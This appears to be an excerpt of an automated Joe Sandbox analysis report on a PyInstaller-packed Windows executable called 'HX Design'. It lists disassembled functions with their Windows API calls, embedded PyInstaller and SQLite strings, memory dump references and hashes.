Part of subcall function 00007FF732068570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
Part of subcall function 00007FF732068570: CloseHandle.KERNEL32 ref: 00007FF732068646

LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF73206916C
LocalFree.KERNEL32(?,00007FF732063C55), ref: 00007FF732069175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF732069142
D:(A;;FA;;;%s), xrefs: 00007FF732069157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF732069183
S-1-3-4, xrefs: 00007FF732069121

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: acf6b1592f859a49830db41f1cc66abec1b0fdd65fac89753ce5a9c2fc968da1
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 2C216231B08742A1F610BB20E5152FAE261FF84780FD44036EA4D57B96DFBCD849E760

Function 00007FFDFB3055D0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB305985
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30599A

Strings

database corruption, xrefs: 00007FFDFB305621
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB305615
%s at line %d of [%.10s], xrefs: 00007FFDFB30562D

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
Instruction ID: f8a309bf782bfead80f6c7faba27564923c3c78614d3a60fff6797397be4e488
Opcode Fuzzy Hash: 5ce4de3094b3936009b68ce7b97789b60abce1f3b9da125a688e22a66712f262
Instruction Fuzzy Hash: 0DD1B172B0A68687DB60DF19D094B69B3A5FF84B88F5A4032DE9D477A8DF38D841C740

Function 00007FF73207B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B30D
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B33A
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B34B
FlsSetValue.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B35C
SetLastError.KERNEL32(?,?,?,00007FF732074F11,?,?,?,?,00007FF73207A48A,?,?,?,?,00007FF73207718F), ref: 00007FF73207B377

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction ID: 4e2f5dd7773db595235df4696eed858f3ba725a20cb7e844db9264bc19a4165d
Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction Fuzzy Hash: DA11A230B0C642A2FA587329568513DD2429F447B0FD44735D83E877D6DEACB489E720

Function 00007FFDFB338C10 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB338E2D
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB338EFC
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB338FFC

Strings

%Q%s, xrefs: 00007FFDFB338F62
"%w" , xrefs: 00007FFDFB338CBB

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: "%w" $%Q%s
API String ID: 4225454184-1987291987
Opcode ID: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
Instruction ID: 4177ddadef53e9b545355a0b52b6a081fde3ce1f6a711a7bdefec4afb0e871de
Opcode Fuzzy Hash: 697807ff2bef80b0a8f6c162638d2e41be052984f89453d995ead0cb1d7b40fc
Instruction Fuzzy Hash: 94C1F421B4AA8386EB15DF15A460A7A67A0FB44BA4F084235DE7E077F8CF3DE485C300

Function 00007FFDFB301040 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 253COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB301317
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB301385

Strings

database corruption, xrefs: 00007FFDFB3010CE
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB3010C2
%s at line %d of [%.10s], xrefs: 00007FFDFB3010DA

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
Instruction ID: 39cdeae6c2100d715f89879c0607ef1891919f9f0ba030c4b52072c40c9f43dd
Opcode Fuzzy Hash: 0235fca2d0f175db58fc5e3e3c02f5a62c82d5e712601103777287498438dc37
Instruction Fuzzy Hash: 95A12772B0E6D246D7259B1994A0ABE7BE1FB80784F094235EBDA837D9DE3CD055C700

Function 00007FFDFB337CA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 215COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB337EAE
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB337F19

Strings

virtual tables may not be altered, xrefs: 00007FFDFB337D38
Cannot add a column to a view, xrefs: 00007FFDFB337D54
sqlite_altertab_%s, xrefs: 00007FFDFB337E6D

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 4225454184-2063813899
Opcode ID: 0f4a477d62f3d65d23696e639a11322eccfa21096bcd5279f8ee82e5454cacc9
Instruction ID: 5efef72272a8b7b8737d4e602dbe3739dc0bcfde1b530aaa29bc786303528305
Opcode Fuzzy Hash: 0f4a477d62f3d65d23696e639a11322eccfa21096bcd5279f8ee82e5454cacc9
Instruction Fuzzy Hash: E791C162B0AB82C3EB50DF159420ABA77E5FB44B84F499235DE6D477A9DF38E081C300

Function 00007FFDFB308690 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30884C
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB308951

Strings

database corruption, xrefs: 00007FFDFB30873F
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB30872C
%s at line %d of [%.10s], xrefs: 00007FFDFB308746

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
Instruction ID: 9105c5a4d229e35e097819da35f1285e861bfee39b345d6262cf20b7cf873c5a
Opcode Fuzzy Hash: cd9a2a69e9f7d6ade83202e689fa17b35f9cfb5684c60c5359bf09700d52bd0d
Instruction Fuzzy Hash: D591C362B092C29BD711AB26D1A0ABE77E0FB40B88F084136DB9D476E9DF3CE455C740

Function 00007FFDFB30B070 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFB3098B0: 00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30991D
Part of subcall function 00007FFDFB3098B0: 00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB309944

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30B2F3
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30B309

Strings

database corruption, xrefs: 00007FFDFB30B130
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB30B117
%s at line %d of [%.10s], xrefs: 00007FFDFB30B137

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
Instruction ID: 1b929060ab1f25b3a85ab1a9e46dc18b27455cfd2ecdcee17254801169625b5f
Opcode Fuzzy Hash: 3d911d27234210aac6b08763dd98c396f9c552569a20e5164efd14393bc372d3
Instruction Fuzzy Hash: 7381CF26B0968287D750AF25D064BAE77A5FB447C8F088036EB9E477A9DF38D446C701

Function 00007FF732062910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF732061B6A), ref: 00007FF73206295E

Strings

Error, xrefs: 00007FF732062A0E
[PYI-%d:ERROR] , xrefs: 00007FF732062966
Error [ANSI Fallback], xrefs: 00007FF7320629FF
%s: %s, xrefs: 00007FF7320629E8

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 512a3ce63ac4637b42a212e25544e0c80f7409538e8813506ed7afeb1f60d510
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 88312622B1868166E720B765A8402F7E294FF887D4F800132FE8D83755EFBCD54AD620

Function 00007FF732062390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7320623C8
DialogBoxIndirectParamW.USER32 ref: 00007FF73206248E
DeleteObject.GDI32 ref: 00007FF7320624C1
DestroyIcon.USER32 ref: 00007FF7320624D3

Strings

Unhandled exception in script, xrefs: 00007FF7320623F8

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction ID: 777644cc3ed31458f20c14535f226a9951ffdaa53cc1dcfabbf4cfbc9e3791a4
Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction Fuzzy Hash: 5031837271968199EB20FF21E8552FAA360FF88788F840135EA4D87B5ADF7CD108D710

Function 00007FF732062B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF73206918F,?,00007FF732063C55), ref: 00007FF732062BA0
MessageBoxW.USER32 ref: 00007FF732062C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF732062BA8
WARNING, xrefs: 00007FF732062BAF
Warning, xrefs: 00007FF732062C1D

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 6c2ff5dee5daf53e4cd41c89d6dcd444d7a53b8cddbd14a373a39e3ef6f3afaf
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: 0721F432708B41A2E710AB14F8447EAB3A4FB88780F804136EE8D93756EF7CD649C750

Function 00007FF732062710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF732061B99), ref: 00007FF732062760

Strings

Error, xrefs: 00007FF7320627DE
Error [ANSI Fallback], xrefs: 00007FF7320627CF
[PYI-%d:%s] , xrefs: 00007FF732062768
ERROR, xrefs: 00007FF73206276F

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 6f0ddf64b30ce57bc7c4a3b5286dd292a5ff2cf1553aa8f40079a70b5259f87b
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: CC21A132B19781A2E720AB54F8407EAA394FB88784F800132FE8C83759EFBCD149D750

Function 00007FF732079A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF732079AAD
GetProcAddress.KERNEL32 ref: 00007FF732079AC3
FreeLibrary.KERNEL32 ref: 00007FF732079AEA

Strings

mscoree.dll, xrefs: 00007FF732079AA4
CorExitProcess, xrefs: 00007FF732079ABC

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 4c8ac577bc84f2e3598a64fa95ceeedc12c0a91acfa27cf058b7d1a88a5209b2
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 29F0C221B0A706A1EE10AB24E48537AA320EF45760FD40235C67E862F4CFACD04CE360

Function 00007FF732089368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF732089390
_set_statfp.LIBCMT ref: 00007FF7320893AB
_set_statfp.LIBCMT ref: 00007FF7320893C7
_set_statfp.LIBCMT ref: 00007FF732089403

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 4857583898f123c196153820948167680cf688ed728d379dc45ad4bd8587d776
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: A4118222E5CA0B22FA653165E4D137B9050EF59370F840634EBEE173D68EEC6849E120

Function 00007FF73207B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B407
FlsSetValue.KERNEL32(?,?,?,00007FF73207A5A3,?,?,00000000,00007FF73207A83E,?,?,?,?,?,00007FF73207A7CA), ref: 00007FF73207B418

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction ID: d91933723b99941e9c2a813186865576ca2d83b7731c0a95a87b2dcec63515c8
Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction Fuzzy Hash: 10117F30E0C642A2FA58B3299941179E1815F547B0FD84334E93E567D6DEACA85AE720

Function 00007FF73207B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF73207B235
FlsSetValue.KERNEL32 ref: 00007FF73207B254
FlsSetValue.KERNEL32 ref: 00007FF73207B27C
FlsSetValue.KERNEL32 ref: 00007FF73207B28D
FlsSetValue.KERNEL32 ref: 00007FF73207B29E

Memory Dump Source

